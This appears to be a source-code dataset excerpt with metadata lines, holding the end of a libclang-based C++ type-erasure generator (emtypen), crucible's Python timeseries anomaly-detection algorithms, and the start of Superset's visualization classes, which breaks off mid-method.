pure_virtual_members='{pure_virtual_members}',
virtual_members='{virtual_members}'
),
lines
)
nonvirtual_members = ''
pure_virtual_members = ''
virtual_members = ''
for function in data.member_functions:
if data.copy_on_write:
nonvirtual_members += \
indentation + function[0] + '\n' + \
indentation + '{ assert(handle_); ' + function[2] + \
(function[4] == 'const' and 'read().' or 'write().') + \
function[3] + '(' + function[1] + ' ); }\n'
else:
nonvirtual_members += \
indentation + function[0] + '\n' + \
indentation + '{ assert(handle_); ' + function[2] + \
'handle_->' + function[3] + \
'(' + function[1] + ' ); }\n'
pure_virtual_members += \
indentation * 2 + 'virtual ' + function[0] + ' = 0;\n'
virtual_members += \
indentation * 2 + 'virtual ' + function[0] + '\n' + \
indentation * 2 + '{ ' + function[2] + \
'value_.' + function[3] + \
'(' + function[1] + ' ); }\n'
nonvirtual_members = nonvirtual_members[:-1]
pure_virtual_members = pure_virtual_members[:-1]
virtual_members = virtual_members[:-1]
lines[expansion_lines[0][0]] = nonvirtual_members
lines[expansion_lines[1][0]] = pure_virtual_members
lines[expansion_lines[2][0]] = virtual_members
output[0] += '\n'
for line in lines:
output[0] += indent_lines(line) + '\n'
def open_namespace (namespace_):
output[0] += '\n' + indent() + 'namespace ' + namespace_.spelling + ' {'
def close_namespace ():
output[0] += '\n' + indent() + '}\n'
class child_visit:
Break = 0
Continue = 1
Recurse = 2
def visit_impl (cursor, parent):
# close open namespaces we have left
enclosing_namespace = parent
while enclosing_namespace != data.tu.cursor and \
enclosing_namespace.kind != clang.cindex.CursorKind.NAMESPACE:
enclosing_namespace = enclosing_namespace.semantic_parent
if enclosing_namespace != data.tu.cursor and \
enclosing_namespace.kind == clang.cindex.CursorKind.NAMESPACE:
while len(data.current_namespaces) and \
enclosing_namespace != data.current_namespaces[-1]:
data.current_namespaces.pop()
close_namespace()
# close open struct if we have left it
enclosing_struct = parent
while enclosing_struct and \
enclosing_struct != data.tu.cursor and \
not struct_kind(enclosing_struct.kind):
enclosing_struct = enclosing_struct.semantic_parent
if enclosing_struct and \
data.current_struct != null_cursor and \
enclosing_struct != data.current_struct:
close_struct()
data.current_struct = null_cursor
data.member_functions = []
location = cursor.location
from_main_file_ = from_main_file(location)
kind = cursor.kind
if kind == clang.cindex.CursorKind.NAMESPACE:
if from_main_file_:
print_headers()
open_namespace(cursor)
data.current_namespaces.append(cursor)
return child_visit.Recurse
elif not from_main_file_:
return child_visit.Continue
elif struct_kind(kind):
if data.current_struct == null_cursor:
print_headers()
data.current_struct = cursor
data.current_struct_prefix = struct_prefix(cursor)
return child_visit.Recurse
elif kind == clang.cindex.CursorKind.CXX_METHOD:
data.member_functions.append(member_params(cursor))
return child_visit.Continue
def visit (cursor, parent=None):
for child in cursor.get_children():
result = visit_impl(child, cursor)
if result == child_visit.Recurse:
if visit(child, cursor) == child_visit.Break:
return child_visit.Break
elif result == child_visit.Break:
return child_visit.Break
elif result == child_visit.Continue:
continue
manual = '''emtypen Users' Manual
emtypen generates type erasure C++ code. It does this to automate much of the
drudgery of creating such types by hand.
Some of this might not make sense if you don't know how type erasure works.
See http://tzlaine.github.io/type_erasure if this is the case.
At the highest level of abstraction, emtypen takes three input files
containing code and generates a single output source file. It uses libclang,
a wrapper around the Clang front end, to do this.
The three input files are the "archetype" file, the "form" file, and the
"header" file. The archetype must always be specified. There are implicit
defaults for the form and header.
The Archetype File
The archetype file contains one or more structs, struct templates, classes
and/or class templates (hereafter generically referred to just as
"archetypes"). Archetypes that are templates produce generated types
("erased types" hereafter) that are also templates.
Each archetype defines the public API that the erased type requires of all the
types that it can hold. The erased type will also contain all the
contructors, assignment operators and other operators defined in the form
provided. It is an error to define any of these fundamental operations in the
archetype; they go in the form instead. Here is an example archetype file:
#ifndef LOGGABLE_INTERFACE_INCLUDED__
#define LOGGABLE_INTERFACE_INCLUDED__
#include <iostream>
struct loggable
{
std::ostream & log (std::ostream & os) const;
};
#endif
Note that this is a complete and valid C++ header. You can syntax check it
with your favorite compiler if you like. emtypen will preserve the include
guard, if any, include directives, if any, and the namespaces in which the
archetypes are declared, if any.
IMPORTANT: Give each function parameter a name. If the parameters in an
archetype's functions are left unnamed, the generated forwarding functions
will be malformed.
Due to libclang limitations, macros and comments are not preserved.
Declarations other than the ones listed above are not preserved (for instance,
function declarations).
The Form File
The form file contains a template-like form that gets filled in with
repetitive code generated from an archetype. The form will be repeated in the
output once for each archetype.
There are certain magic strings in the form that are replaced with generated
code. If you want to create a new form or modify an existing one, you need to
include:
%struct_prefix% - This is replaced with the tokens that introduce the
archetype by name, along with "struct", "class", "template <...>" etc.
%struct_name% - This is replaced with only the archetype's name.
%nonvirtual_members% - This is the generated portion of the API of the erased
type. It is replaced with a version of the functions in the archetype that
forwards each call to the virtual functions in the handle object.
%pure_virtual_members% - This is the generated portion of the API of the
handle base class. It is replaced with pure virtual declarations of the
functions in the archetype.
%virtual_members% - This is the generated portion of the API of the derived
handle class. It is replaced with virtual function definitions of the
functions in the archetype that forward to the underlying held value.
Within the constraints implied by the pattern of code generation outlined
above, the form can include anything you like.
However, the forwarding function code generation needs to know if your form
uses copy-on-write in order to perform the copy on mutating function calls.
If you specify on the command line that emtypen should generate code usable
with a copy-on-write form (see emtypen --help for details), the generated code
will rely on two functions that must be in the form: read() and write(). They
must return const and non-const references respectively to the underlying
handle. They may be public or private. read() will be called in every const
member function in the archetype's API, and write() will be called in every
non-const member function.
The Header file
The header file should contain all headers, macros, forward declarations,
etc. required by the code in the form. Headers required by the code in an
archetype file should be included there, not in the header file.
Command Line Options
An alternate form file and/or header file can be specified on the command
line. Also, you will probably need to generate slightly different code for
forms that use copy-on-write. See emtypen --help for details.
'''
def prepare_form_impl (form):
form = form.replace('{', '{{')
form = form.replace('}', '}}')
regex = re.compile(r'%(\w+)%')
return regex.sub(r'{\1}', form)[:-1]
def prepare_form (form):
if type(form) == str:
return prepare_form_impl(form)
else:
for i in range(len(form)):
form[i] = prepare_form_impl(form[i])
return form
def print_diagnostic(diag):
severities = ['ignored', 'note', 'warning', 'error', 'fatal error']
file_ = diag.location.file
line = diag.location.line
column = diag.location.column
severity = severities[diag.severity]
spelling = diag.spelling
os.write(2, '{file_}:{line}:{column} {severity}: {spelling}\n'.format(**locals()))
# main
if '--manual' in sys.argv:
print manual
exit(0)
parser = argparse.ArgumentParser(description='Generates type erased C++ code.')
parser.add_argument('--form', type=str, required=True, help='form used to generate code')
parser.add_argument('--headers', type=str, required=False, help='file containing headers to prepend to the generated code')
parser.add_argument('--copy-on-write', type=str, required=False, help='generate code suitable for a COW implementation')
parser.add_argument('--out-file', type=str, required=False, help='write output to given file')
parser.add_argument('--clang-path', type=str, required=False, help='path to libclang library')
parser.add_argument('--manual', action='store_true', required=False, help='print a much longer manual to the terminal')
parser.add_argument('file', type=str, help='the input file containing archetypes')
parser.add_argument('clang_args', metavar='Clang-arg', type=str, nargs=argparse.REMAINDER,
help='additional args to pass to Clang')
args = parser.parse_args()
if args.clang_path:
clang.cindex.Config.set_library_path(args.clang_path)
null_cursor = clang.cindex.conf.lib.clang_getNullCursor()
from_main_file = clang.cindex.conf.lib.clang_Location_isFromMainFile
data = client_data()
data.form = prepare_form(open(args.form).read())
data.form_lines = prepare_form(open(args.form).readlines())
data.headers = args.headers and open(args.headers).read() or ''
include_guarded = False
archetypes = open(args.file).read()
archetypes_lines = open(args.file).readlines()
guard_regex = re.compile(r'#ifndef\s+([^\s]+)[^\n]*\n#define\s+\1')
match = guard_regex.search(archetypes)
if match and match.start() == archetypes.index('#'):
include_guarded = True
output[0] += '''#ifndef {0}
#define {0}
'''.format(match.group(1))
all_clang_args = [args.file]
all_clang_args.extend(args.clang_args)
index = Index.create()
data.tu = index.parse(None, all_clang_args, options=clang.cindex.TranslationUnit.PARSE_DETAILED_PROCESSING_RECORD)
data.filename = data.tu.spelling
if data.filename == '':
exit(1)
for diag in data.tu.diagnostics:
print_diagnostic(diag)
includes = [archetypes_lines[x.location.line - 1] for x in data.tu.get_includes() if x.depth == 1]
for include in includes:
output[0] += include
visit(data.tu.cursor)
if data.current_struct != null_cursor:
close_struct()
while len(data.current_namespaces):
data.current_namespaces.pop()
close_namespace()
if include_guarded:
output[0] += '#endif\n'
if not args.out_file:
print output[0]
else:
ofs = open(args.out_file, 'w')
ofs.write(output[0])
|
tzlaine/type_erasure
|
emtypen/emtypen.py
|
Python
|
mit
| 17,634
|
[
"VisIt"
] |
4873371b3d7d26807c8bf78ad2855a7c32765a79d55ba3d9530fd65349f82a1a
|
import pandas
import numpy as np
import scipy
import statsmodels.api as sm
import matplotlib.pyplot as plt
import traceback
import os
from multiprocessing import Process
from time import time
from settings import ALGORITHMS
from os.path import dirname, join, abspath
"""
This is no man's land. Do anything you want in here,
as long as you return a boolean that determines whether the input
timeseries is anomalous or not.
To add an algorithm, define it here, and add its name to settings.ALGORITHMS.
"""
def tail_avg(timeseries):
"""
This is a utility function used to calculate the average of the last three
datapoints in the series as a measure, instead of just the last datapoint.
It reduces noise, but it also reduces sensitivity and increases the delay
to detection.
"""
try:
t = (timeseries[-1][1] + timeseries[-2][1] + timeseries[-3][1]) / 3
return t
except IndexError:
return timeseries[-1][1]
def median_absolute_deviation(timeseries):
"""
A timeseries is anomalous if the deviation of its latest datapoint with
respect to the median is X times larger than the median of deviations.
"""
series = pandas.Series([x[1] for x in timeseries])
median = series.median()
demedianed = np.abs(series - median)
median_deviation = demedianed.median()
# The test statistic is infinite when the median is zero,
# so it becomes super sensitive. We play it safe and skip when this happens.
if median_deviation == 0:
return False
test_statistic = demedianed.iget(-1) / median_deviation
# Completely arbitary...triggers if the median deviation is
# 6 times bigger than the median
if test_statistic > 6:
return True
def grubbs(timeseries):
"""
A timeseries is anomalous if the Z score is greater than the Grubb's score.
"""
series = scipy.array([x[1] for x in timeseries])
stdDev = scipy.std(series)
mean = np.mean(series)
tail_average = tail_avg(timeseries)
z_score = (tail_average - mean) / stdDev
len_series = len(series)
threshold = scipy.stats.t.isf(.05 / (2 * len_series) , len_series - 2)
threshold_squared = threshold * threshold
grubbs_score = ((len_series - 1) / np.sqrt(len_series)) * np.sqrt(threshold_squared / (len_series - 2 + threshold_squared))
return z_score > grubbs_score
def first_hour_average(timeseries):
"""
Calcuate the simple average over one hour, FULL_DURATION seconds ago.
A timeseries is anomalous if the average of the last three datapoints
are outside of three standard deviations of this value.
"""
last_hour_threshold = time() - (86400 - 3600)
series = pandas.Series([x[1] for x in timeseries if x[0] < last_hour_threshold])
mean = (series).mean()
stdDev = (series).std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_average(timeseries):
"""
A timeseries is anomalous if the absolute value of the average of the latest
three datapoint minus the moving average is greater than one standard
deviation of the average. This does not exponentially weight the MA and so
is better for detecting anomalies with respect to the entire series.
"""
series = pandas.Series([x[1] for x in timeseries])
mean = series.mean()
stdDev = series.std()
t = tail_avg(timeseries)
return abs(t - mean) > 3 * stdDev
def stddev_from_moving_average(timeseries):
"""
A timeseries is anomalous if the absolute value of the average of the latest
three datapoint minus the moving average is greater than one standard
deviation of the moving average. This is better for finding anomalies with
respect to the short term trends.
"""
series = pandas.Series([x[1] for x in timeseries])
expAverage = pandas.stats.moments.ewma(series, com=50)
stdDev = pandas.stats.moments.ewmstd(series, com=50)
return abs(series.iget(-1) - expAverage.iget(-1)) > 3 * stdDev.iget(-1)
def mean_subtraction_cumulation(timeseries):
"""
A timeseries is anomalous if the value of the next datapoint in the
series is farther than a standard deviation out in cumulative terms
after subtracting the mean from each data point.
"""
series = pandas.Series([x[1] if x[1] else 0 for x in timeseries])
series = series - series[0:len(series) - 1].mean()
stdDev = series[0:len(series) - 1].std()
expAverage = pandas.stats.moments.ewma(series, com=15)
return abs(series.iget(-1)) > 3 * stdDev
def least_squares(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints
on a projected least squares model is greater than three sigma.
"""
x = np.array([t[0] for t in timeseries])
y = np.array([t[1] for t in timeseries])
A = np.vstack([x, np.ones(len(x))]).T
results = np.linalg.lstsq(A, y)
residual = results[1]
m, c = np.linalg.lstsq(A, y)[0]
errors = []
for i, value in enumerate(y):
projected = m * x[i] + c
error = value - projected
errors.append(error)
if len(errors) < 3:
return False
std_dev = scipy.std(errors)
t = (errors[-1] + errors[-2] + errors[-3]) / 3
return abs(t) > std_dev * 3 and round(std_dev) != 0 and round(t) != 0
def histogram_bins(timeseries):
"""
A timeseries is anomalous if the average of the last three datapoints falls
into a histogram bin with less than 20 other datapoints (you'll need to tweak
that number depending on your data)
Returns: the size of the bin which contains the tail_avg. Smaller bin size
means more anomalous.
"""
series = scipy.array([x[1] for x in timeseries])
t = tail_avg(timeseries)
h = np.histogram(series, bins=15)
bins = h[1]
for index, bin_size in enumerate(h[0]):
if bin_size <= 20:
# Is it in the first bin?
if index == 0:
if t <= bins[0]:
return True
# Is it in the current bin?
elif t >= bins[index] and t < bins[index + 1]:
return True
return False
def ks_test(timeseries):
"""
A timeseries is anomalous if 2 sample Kolmogorov-Smirnov test indicates
that data distribution for last 10 minutes is different from last hour.
It produces false positives on non-stationary series so Augmented
Dickey-Fuller test applied to check for stationarity.
"""
hour_ago = time() - 3600
ten_minutes_ago = time() - 600
reference = scipy.array([x[1] for x in timeseries if x[0] >= hour_ago and x[0] < ten_minutes_ago])
probe = scipy.array([x[1] for x in timeseries if x[0] >= ten_minutes_ago])
if reference.size < 20 or probe.size < 20:
return False
ks_d,ks_p_value = scipy.stats.ks_2samp(reference, probe)
if ks_p_value < 0.05 and ks_d > 0.5:
adf = sm.tsa.stattools.adfuller(reference, 10)
if adf[1] < 0.05:
return True
return False
def run_algorithms(timeseries, timeseries_name):
"""
Iteratively run algorithms.
"""
__results__ = abspath(join(dirname( __file__ ), '..', 'results'))
try:
for algorithm in ALGORITHMS:
x_vals = np.arange(len(timeseries))
y_vals = np.array([y[1] for y in timeseries])
plt.plot(x_vals, y_vals)
# Start a couple datapoints in for the tail average
for index in range(10, len(timeseries)):
sliced = timeseries[:index]
anomaly = globals()[algorithm](sliced)
# Point out the datapoint if it's anomalous
if anomaly:
plt.plot([index], [sliced[-1][1]], 'ro')
plt.savefig(__results__ + "/"+ algorithm + "-" + timeseries_name + ".png")
print algorithm
except:
print("Algorithm error: " + traceback.format_exc())
|
astanway/crucible
|
src/algorithms.py
|
Python
|
mit
| 7,970
|
[
"ADF"
] |
be10a275facad9baefbf3bf93ce607bdb544afc7d94e27e2da192ca55c5bff19
|
"""This module contains the "Viz" objects
These objects represent the backend of all the visualizations that
Superset can render.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import hashlib
import logging
import traceback
import uuid
import zlib
from collections import OrderedDict, defaultdict
from itertools import product
from datetime import datetime, timedelta
import pandas as pd
import numpy as np
from flask import request
from flask_babel import lazy_gettext as _
from markdown import markdown
import simplejson as json
from six import string_types, PY3
from dateutil import relativedelta as rdelta
from superset import app, utils, cache, get_manifest_file
from superset.utils import DTTM_ALIAS
config = app.config
stats_logger = config.get('STATS_LOGGER')
class BaseViz(object):
"""All visualizations derive this base class"""
viz_type = None
verbose_name = "Base Viz"
credits = ""
is_timeseries = False
def __init__(self, datasource, form_data):
if not datasource:
raise Exception(_("Viz is missing a datasource"))
self.datasource = datasource
self.request = request
self.viz_type = form_data.get("viz_type")
self.form_data = form_data
self.query = ""
self.token = self.form_data.get(
'token', 'token_' + uuid.uuid4().hex[:8])
self.metrics = self.form_data.get('metrics') or []
self.groupby = self.form_data.get('groupby') or []
self.status = None
self.error_message = None
def get_df(self, query_obj=None):
"""Returns a pandas dataframe based on the query object"""
if not query_obj:
query_obj = self.query_obj()
self.error_msg = ""
self.results = None
timestamp_format = None
if self.datasource.type == 'table':
dttm_col = self.datasource.get_col(query_obj['granularity'])
if dttm_col:
timestamp_format = dttm_col.python_date_format
# The datasource here can be different backend but the interface is common
self.results = self.datasource.query(query_obj)
self.query = self.results.query
self.status = self.results.status
self.error_message = self.results.error_message
df = self.results.df
# Transform the timestamp we received from database to pandas supported
# datetime format. If no python_date_format is specified, the pattern will
# be considered as the default ISO date format
# If the datetime format is unix, the parse will use the corresponding
# parsing logic.
if df is None or df.empty:
self.status = utils.QueryStatus.FAILED
if not self.error_message:
self.error_message = "No data."
return pd.DataFrame()
else:
if DTTM_ALIAS in df.columns:
if timestamp_format in ("epoch_s", "epoch_ms"):
df[DTTM_ALIAS] = pd.to_datetime(df[DTTM_ALIAS], utc=False)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format)
if self.datasource.offset:
df[DTTM_ALIAS] += timedelta(hours=self.datasource.offset)
df.replace([np.inf, -np.inf], np.nan)
df = df.fillna(0)
return df
def get_extra_filters(self):
extra_filters = self.form_data.get('extra_filters', [])
return {f['col']: f['val'] for f in extra_filters}
def query_obj(self):
"""Building a query object"""
form_data = self.form_data
gb = form_data.get("groupby") or []
metrics = form_data.get("metrics") or []
columns = form_data.get("columns") or []
groupby = []
for o in gb + columns:
if o not in groupby:
groupby.append(o)
is_timeseries = self.is_timeseries
if DTTM_ALIAS in groupby:
groupby.remove(DTTM_ALIAS)
is_timeseries = True
# extra_filters are temporary/contextual filters that are external
# to the slice definition. We use those for dynamic interactive
# filters like the ones emitted by the "Filter Box" visualization
extra_filters = self.get_extra_filters()
granularity = (
form_data.get("granularity") or form_data.get("granularity_sqla")
)
limit = int(form_data.get("limit") or 0)
timeseries_limit_metric = form_data.get("timeseries_limit_metric")
row_limit = int(
form_data.get("row_limit") or config.get("ROW_LIMIT"))
# default order direction
order_desc = form_data.get("order_desc", True)
# __form and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
since = (
extra_filters.get('__from') or
form_data.get("since") or ''
)
# Backward compatibility hack
since_words = since.split(' ')
grains = ['days', 'years', 'hours', 'day', 'year', 'weeks']
if (len(since_words) == 2 and since_words[1] in grains):
since += ' ago'
from_dttm = utils.parse_human_datetime(since)
until = extra_filters.get('__to') or form_data.get("until", "now")
to_dttm = utils.parse_human_datetime(until)
if from_dttm and to_dttm and from_dttm > to_dttm:
raise Exception(_("From date cannot be larger than to date"))
# extras are used to query elements specific to a datasource type
# for instance the extra where clause that applies only to Tables
extras = {
'where': form_data.get("where", ''),
'having': form_data.get("having", ''),
'having_druid': form_data.get('having_filters', []),
'time_grain_sqla': form_data.get("time_grain_sqla", ''),
'druid_time_origin': form_data.get("druid_time_origin", ''),
}
filters = form_data.get('filters', [])
for col, vals in self.get_extra_filters().items():
if not (col and vals) or col.startswith('__'):
continue
elif col in self.datasource.filterable_column_names:
# Quote values with comma to avoid conflict
filters += [{
'col': col,
'op': 'in',
'val': vals,
}]
d = {
'granularity': granularity,
'from_dttm': from_dttm,
'to_dttm': to_dttm,
'is_timeseries': is_timeseries,
'groupby': groupby,
'metrics': metrics,
'row_limit': row_limit,
'filter': filters,
'timeseries_limit': limit,
'extras': extras,
'timeseries_limit_metric': timeseries_limit_metric,
'form_data': form_data,
'order_desc': order_desc
}
return d
@property
def cache_timeout(self):
if self.form_data.get('cache_timeout'):
return int(self.form_data.get('cache_timeout'))
if self.datasource.cache_timeout:
return self.datasource.cache_timeout
if (
hasattr(self.datasource, 'database') and
self.datasource.database.cache_timeout):
return self.datasource.database.cache_timeout
return config.get("CACHE_DEFAULT_TIMEOUT")
def get_json(self, force=False):
return json.dumps(
self.get_payload(force),
default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def cache_key(self):
s = str([(k, self.form_data[k]) for k in sorted(self.form_data.keys())])
return hashlib.md5(s.encode('utf-8')).hexdigest()
def get_payload(self, force=False):
"""Handles caching around the json payload retrieval"""
cache_key = self.cache_key
payload = None
force = force if force else self.form_data.get('force') == 'true'
if not force and cache:
payload = cache.get(cache_key)
if payload:
stats_logger.incr('loaded_from_cache')
is_cached = True
try:
cached_data = zlib.decompress(payload)
if PY3:
cached_data = cached_data.decode('utf-8')
payload = json.loads(cached_data)
except Exception as e:
logging.error("Error reading cache: " +
utils.error_msg_from_exception(e))
payload = None
logging.info("Serving from cache")
if not payload:
stats_logger.incr('loaded_from_source')
data = None
is_cached = False
cache_timeout = self.cache_timeout
stacktrace = None
try:
df = self.get_df()
if not self.error_message:
data = self.get_data(df)
except Exception as e:
logging.exception(e)
if not self.error_message:
self.error_message = str(e)
self.status = utils.QueryStatus.FAILED
data = None
stacktrace = traceback.format_exc()
payload = {
'cache_key': cache_key,
'cache_timeout': cache_timeout,
'data': data,
'error': self.error_message,
'form_data': self.form_data,
'query': self.query,
'status': self.status,
'stacktrace': stacktrace,
}
payload['cached_dttm'] = datetime.utcnow().isoformat().split('.')[0]
logging.info("Caching for the next {} seconds".format(
cache_timeout))
data = self.json_dumps(payload)
if PY3:
data = bytes(data, 'utf-8')
if cache and self.status != utils.QueryStatus.FAILED:
try:
cache.set(
cache_key,
zlib.compress(data),
timeout=cache_timeout)
except Exception as e:
# cache.set call can fail if the backend is down or if
# the key is too large or whatever other reasons
logging.warning("Could not cache key {}".format(cache_key))
logging.exception(e)
cache.delete(cache_key)
payload['is_cached'] = is_cached
return payload
def json_dumps(self, obj):
return json.dumps(obj, default=utils.json_int_dttm_ser, ignore_nan=True)
@property
def data(self):
"""This is the data object serialized to the js layer"""
content = {
'form_data': self.form_data,
'token': self.token,
'viz_name': self.viz_type,
'filter_select_enabled': self.datasource.filter_select_enabled,
}
return content
def get_csv(self):
df = self.get_df()
include_index = not isinstance(df.index, pd.RangeIndex)
return df.to_csv(index=include_index, **config.get('CSV_EXPORT'))
def get_data(self, df):
return []
@property
def json_data(self):
return json.dumps(self.data)
class TableViz(BaseViz):
"""A basic html table that is sortable and searchable"""
viz_type = "table"
verbose_name = _("Table View")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def should_be_timeseries(self):
fd = self.form_data
# TODO handle datasource-type-specific code in datasource
conditions_met = (
(fd.get('granularity') and fd.get('granularity') != 'all') or
(fd.get('granularity_sqla') and fd.get('time_grain_sqla'))
)
if fd.get('include_time') and not conditions_met:
raise Exception(_(
"Pick a granularity in the Time section or "
"uncheck 'Include Time'"))
return fd.get('include_time')
def query_obj(self):
d = super(TableViz, self).query_obj()
fd = self.form_data
if fd.get('all_columns') and (fd.get('groupby') or fd.get('metrics')):
raise Exception(_(
"Choose either fields to [Group By] and [Metrics] or "
"[Columns], not both"))
sort_by = fd.get('timeseries_limit_metric')
if fd.get('all_columns'):
d['columns'] = fd.get('all_columns')
d['groupby'] = []
order_by_cols = fd.get('order_by_cols') or []
d['orderby'] = [json.loads(t) for t in order_by_cols]
elif sort_by:
if sort_by not in d['metrics']:
d['metrics'] += [sort_by]
d['orderby'] = [(sort_by, not fd.get("order_desc", True))]
d['is_timeseries'] = self.should_be_timeseries()
return d
def get_data(self, df):
if not self.should_be_timeseries() and DTTM_ALIAS in df:
del df[DTTM_ALIAS]
return dict(
records=df.to_dict(orient="records"),
columns=list(df.columns),
)
def json_dumps(self, obj):
if self.form_data.get('all_columns'):
return json.dumps(obj, default=utils.json_iso_dttm_ser)
else:
return super(TableViz, self).json_dumps(obj)
class PivotTableViz(BaseViz):
"""A pivot table view, define your rows, columns and metrics"""
viz_type = "pivot_table"
verbose_name = _("Pivot Table")
credits = 'a <a href="https://github.com/airbnb/superset">Superset</a> original'
is_timeseries = False
def query_obj(self):
d = super(PivotTableViz, self).query_obj()
groupby = self.form_data.get('groupby')
columns = self.form_data.get('columns')
metrics = self.form_data.get('metrics')
if not columns:
columns = []
if not groupby:
groupby = []
if not groupby:
raise Exception(_("Please choose at least one \"Group by\" field "))
if not metrics:
raise Exception(_("Please choose at least one metric"))
if (
any(v in groupby for v in columns) or
any(v in columns for v in groupby)):
raise Exception(_("'Group By' and 'Columns' can't overlap"))
return d
def get_data(self, df):
if (
self.form_data.get("granularity") == "all" and
DTTM_ALIAS in df):
del df[DTTM_ALIAS]
df = df.pivot_table(
index=self.form_data.get('groupby'),
columns=self.form_data.get('columns'),
values=self.form_data.get('metrics'),
aggfunc=self.form_data.get('pandas_aggfunc'),
margins=self.form_data.get('pivot_margins'),
)
# Display metrics side by side with each column
if self.form_data.get('combine_metric'):
df = df.stack(0).unstack()
return dict(
columns=list(df.columns),
html=df.to_html(
na_rep='',
classes=(
"dataframe table table-striped table-bordered "
"table-condensed table-hover").split(" ")),
)
class MarkupViz(BaseViz):
"""Use html or markdown to create a free form widget"""
viz_type = "markup"
verbose_name = _("Markup")
is_timeseries = False
def get_df(self):
return True
def get_data(self, df):
markup_type = self.form_data.get("markup_type")
code = self.form_data.get("code", '')
if markup_type == "markdown":
code = markdown(code)
return dict(html=code, theme_css=get_manifest_file('theme.css'))
class SeparatorViz(MarkupViz):
"""Use to create section headers in a dashboard, similar to `Markup`"""
viz_type = "separator"
verbose_name = _("Separator")
class WordCloudViz(BaseViz):
"""Build a colorful word cloud
Uses the nice library at:
https://github.com/jasondavies/d3-cloud
"""
viz_type = "word_cloud"
verbose_name = _("Word Cloud")
is_timeseries = False
def query_obj(self):
d = super(WordCloudViz, self).query_obj()
d['metrics'] = [self.form_data.get('metric')]
d['groupby'] = [self.form_data.get('series')]
return d
def get_data(self, df):
# Ordering the columns
df = df[[self.form_data.get('series'), self.form_data.get('metric')]]
# Labeling the columns for uniform json schema
df.columns = ['text', 'size']
return df.to_dict(orient="records")
class TreemapViz(BaseViz):
"""Tree map visualisation for hierarchical data."""
viz_type = "treemap"
verbose_name = _("Treemap")
credits = '<a href="https://d3js.org">d3.js</a>'
is_timeseries = False
def _nest(self, metric, df):
nlevels = df.index.nlevels
if nlevels == 1:
result = [{"name": n, "value": v}
for n, v in zip(df.index, df[metric])]
else:
result = [{"name": l, "children": self._nest(metric, df.loc[l])}
for l in df.index.levels[0]]
return result
def get_data(self, df):
df = df.set_index(self.form_data.get("groupby"))
chart_data = [{"name": metric, "children": self._nest(metric, df)}
for metric in df.columns]
return chart_data
class CalHeatmapViz(BaseViz):
"""Calendar heatmap."""
viz_type = "cal_heatmap"
verbose_name = _("Calendar Heatmap")
credits = (
'<a href=https://github.com/wa0x6e/cal-heatmap>cal-heatmap</a>')
is_timeseries = True
def get_data(self, df):
form_data = self.form_data
df.columns = ["timestamp", "metric"]
timestamps = {str(obj["timestamp"].value / 10**9):
obj.get("metric") for obj in df.to_dict("records")}
start = utils.parse_human_datetime(form_data.get("since"))
end = utils.parse_human_datetime(form_data.get("until"))
domain = form_data.get("domain_granularity")
diff_delta = rdelta.relativedelta(end, start)
diff_secs = (end - start).total_seconds()
if domain == "year":
range_ = diff_delta.years + 1
elif domain == "month":
range_ = diff_delta.years * 12 + diff_delta.months + 1
elif domain == "week":
range_ = diff_delta.years * 53 + diff_delta.weeks + 1
elif domain == "day":
range_ = diff_secs // (24*60*60) + 1
else:
range_ = diff_secs // (60*60) + 1
return {
"timestamps": timestamps,
"start": start,
"domain": domain,
"subdomain": form_data.get("subdomain_granularity"),
"range": range_,
}
def query_obj(self):
qry = super(CalHeatmapViz, self).query_obj()
qry["metrics"] = [self.form_data["metric"]]
return qry
class NVD3Viz(BaseViz):
"""Base class for all nvd3 vizs"""
credits = '<a href="http://nvd3.org/">NVD3.org</a>'
viz_type = None
verbose_name = "Base NVD3 Viz"
is_timeseries = False
class BoxPlotViz(NVD3Viz):
"""Box plot viz from ND3"""
viz_type = "box_plot"
verbose_name = _("Box Plot")
sort_series = False
is_timeseries = True
def to_series(self, df, classed='', title_suffix=''):
label_sep = " - "
chart_data = []
for index_value, row in zip(df.index, df.to_dict(orient="records")):
if isinstance(index_value, tuple):
index_value = label_sep.join(index_value)
boxes = defaultdict(dict)
for (label, key), value in row.items():
if key == "median":
key = "Q2"
boxes[label][key] = value
for label, box in boxes.items():
if len(self.form_data.get("metrics")) > 1:
# need to render data labels with metrics
chart_label = label_sep.join([index_value, label])
else:
chart_label = index_value
chart_data.append({
"label": chart_label,
"values": box,
})
return chart_data
def get_data(self, df):
form_data = self.form_data
df = df.fillna(0)
# conform to NVD3 names
def Q1(series): # need to be named functions - can't use lambdas
return np.percentile(series, 25)
def Q3(series):
return np.percentile(series, 75)
whisker_type = form_data.get('whisker_options')
if whisker_type == "Tukey":
def whisker_high(series):
upper_outer_lim = Q3(series) + 1.5 * (Q3(series) - Q1(series))
series = series[series <= upper_outer_lim]
return series[np.abs(series - upper_outer_lim).argmin()]
def whisker_low(series):
lower_outer_lim = Q1(series) - 1.5 * (Q3(series) - Q1(series))
# find the closest value above the lower outer limit
series = series[series >= lower_outer_lim]
return series[np.abs(series - lower_outer_lim).argmin()]
elif whisker_type == "Min/max (no outliers)":
def whisker_high(series):
return series.max()
def whisker_low(series):
return series.min()
elif " percentiles" in whisker_type:
low, high = whisker_type.replace(" percentiles", "").split("/")
def whisker_high(series):
return np.percentile(series, int(high))
def whisker_low(series):
return np.percentile(series, int(low))
else:
raise ValueError("Unknown whisker type: {}".format(whisker_type))
def outliers(series):
above = series[series > whisker_high(series)]
below = series[series < whisker_low(series)]
# pandas sometimes doesn't like getting lists back here
return set(above.tolist() + below.tolist())
aggregate = [Q1, np.median, Q3, whisker_high, whisker_low, outliers]
df = df.groupby(form_data.get('groupby')).agg(aggregate)
chart_data = self.to_series(df)
return chart_data
class BubbleViz(NVD3Viz):
"""Based on the NVD3 bubble chart"""
viz_type = "bubble"
verbose_name = _("Bubble Chart")
is_timeseries = False
def query_obj(self):
form_data = self.form_data
d = super(BubbleViz, self).query_obj()
d['groupby'] = [
form_data.get('entity')
]
if form_data.get('series'):
d['groupby'].append(form_data.get('series'))
self.x_metric = form_data.get('x')
self.y_metric = form_data.get('y')
